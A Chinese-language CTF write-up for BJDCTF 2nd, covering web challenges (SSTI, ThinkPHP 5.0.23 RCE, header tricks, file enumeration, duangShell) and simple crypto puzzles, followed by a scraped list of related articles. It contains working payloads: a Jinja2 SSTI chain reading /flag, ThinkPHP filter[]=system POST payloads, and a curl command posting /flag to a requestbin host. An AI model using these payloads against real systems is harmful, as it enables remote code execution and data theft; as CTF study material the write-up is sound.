BJDCTF 2nd-WP
Web
1.fake google
打开题目的主要界面是一个谷歌的搜索界面,在搜索框输入内容后会有一个新页面
不管输入什么,输出都是P3’s girlfriend is :xxxxxxx
在这个页面查看源代码,发现有一段被注释的代码
<!--ssssssti & a little trick --> P3's girlfirend is : <script>alert(1);</script><br><hr>
从这段代码可以知道是ssti注入
试了试config,有回显
查看flag
{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}
flag{fc4ec771-f9e0-4ad4-afe0-80dfd22dab37}
2.old-hack
查看源码没有什么收获,主页上写的thinkphp5,而版本就是5.0.23
查看根目录,看到了flag
`POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
查看flag
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
flag{da977af6-5828-4a37-9f5b-e1c1d8f25ed5}
3.假猪套天下第一
随便登陆就是这样的界面
抓包有hint,查看L0g1in.php
卡了很久,大佬提示改时间戳
得到了flag
flag <!--ZmxhZ3s4YzImYzc3OC1INGYwLTQ2YWUtODM3YS 1mNDE4MDlwOGYyZTF9Cg==-->
4.
根据提示找到了po,但是没有flag
跑一遍周期表
import requestsurl = 'http://a61c516a-de45-486f-a5ad-0a55e8fb4c8f.node3.buuoj.cn//{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca','Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce','Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir','Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm','Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc','Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:r = requests.get(url=url.format(i))if r.status_code != 404:print(i)text += r.textprint(r.text)print(text)
5.duangShell
swp?直接index.php.swp
vim -r恢复
curl http://requestbin.xxx -X POST -d "`head /flag`"
得到flag
Crypto
1.签到-y1ng
直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==
flag:BJD{W3lc0me_T0_BJDCTF}
2.老文盲了
将文字转化为拼音可以知道文字就是flag
flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝}
3.燕言燕语
通过题目解码得到如下明文,但并不是flag
有两端文字,想到了维吉尼亚密码
yanzi就是密钥,后面的密文,千千秀字可以直接解密
flag: BJD{yanzi_jiushige_shabi}
4.灵能精通
这是圣堂武士密码,猪圈密码的变种
BJDCTF 2nd-WP相关推荐
- [BJDCTF 2nd] Web复现 wp
文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...
- BJDCTF 2nd WEB
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用pay ...
- BJDCTF 2nd -Crypto
BJDCTF 2nd -Crypto cat_flag 在这里插入图片描述 思路 灵能精通-y1ng 题目 思路 燕言燕语-y1ng 题目 思路 Y1nglish-y1ng 题目 思路 cat_fla ...
- [BUUCTF-pwn]——[BJDCTF 2nd]secret
[BUUCTF-pwn]--[BJDCTF 2nd]secret 这道题目,看就考验你的汇编能力了. 因为在反汇编的过程中,有一个函数过大,无法反汇编 在IDA中看到一个格外令人喜欢的东西,可是if ...
- [BUUCTF-pwn]——[BJDCTF 2nd]rci
[BUUCTF-pwn]--[BJDCTF 2nd]rci 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]rci checksec 检查和 IDA大家 ...
- [BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2
[BUUCTF-pwn]--[BJDCTF 2nd]ydsneedgirlfriend2 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]ydsneedg ...
- [BUUCTF-pwn]——[BJDCTF 2nd]test
[BUUCTF-pwn]--[BJDCTF 2nd]test 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]test 用户名是ctf , 密码是test ...
- [BUUCTF-pwn]——[BJDCTF 2nd]r2t3
[BUUCTF-pwn]--[BJDCTF 2nd]r2t3 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 题目: 先将文件下载下来,chec ...
- BJDCTF 2nd writeup(二)
文章目录 Misc [BJDCTF 2nd]A_Beautiful_Picture [BJDCTF 2nd]小姐姐-y1ng [BJDCTF 2nd]TARGZ-y1ng [BJDCTF 2nd]Im ...
- BJDCTF 2nd writeup
文章目录 [BJDCTF 2nd]签到-y1ng [BJDCTF 2nd]灵能精通-y1ng [BJDCTF 2nd]Real_EasyBaBa [BJDCTF 2nd]圣火昭昭-y1ng [BJDC ...
最新文章
- PHP Shell生成工具Weevely
- xenserver下的SR,VDI,VBD
- 12、索引在什么情况下不会被使用?
- Nacos客户端注册的流程图
- [html]说说页面中字体渲染规则是怎样的?会有哪些因素影响字体的渲染?
- 怎么在Word中插入歌曲
- 读者专属福利: Git面试宝典分享
- Mybatis-generator,自动生成文件.问题及解决
- SQL Server 2014 导入Excel
- bootstrap table的属性sidePagination设置不当导致数据不显示
- 周志华教授:长文详细教你如何做研究与写论文?
- 如何在Mac上的一个“预览”窗口中显示若干文件
- [每日一题] 11gOCP 1z0-052 :2013-09-16 shared server mode........................................B21...
- 基于SSM框架的简单图书管理系统
- jquery消息插件 toastr 消息提示插件 弹框提示
- 用PHP查看微信撤回的消息,vbot微信聊天机器人微信聊天消息详解(9):撤回消息和防撤回消息...
- linux结合阿里云企业邮箱配置mailx
- 手把手教你在浏览器(chrom,edge)上安装Tampermonkey(油猴)(附所需所有内容链接)
- 4G EPS 中的小区搜索
- Ubuntu的共享文件夹
热门文章
- 手把手教你使用SSM框架实现一个学生管理系统第二章之创建一个web工程及相关配置文件的介绍
- Vue星级评分(为自己做个笔记)
- AltiumDesigner快捷键——通用AltiumDesigner环境快捷键和常用编辑快捷键
- 准备选型直播SDK产品,ChatGPT竟然这么说...
- 饭否2359条之微信成长记录
- humps在matlab中什么意思,[转载]Humps函数
- JS数组的slice()方法传负数和字符串操作函数中的slice()、substr()、substring()
- windows server 2008r2 oracle11g安装
- linux下运行讯飞语音云的测试程序
- 如何实现身份证输入框的输入效果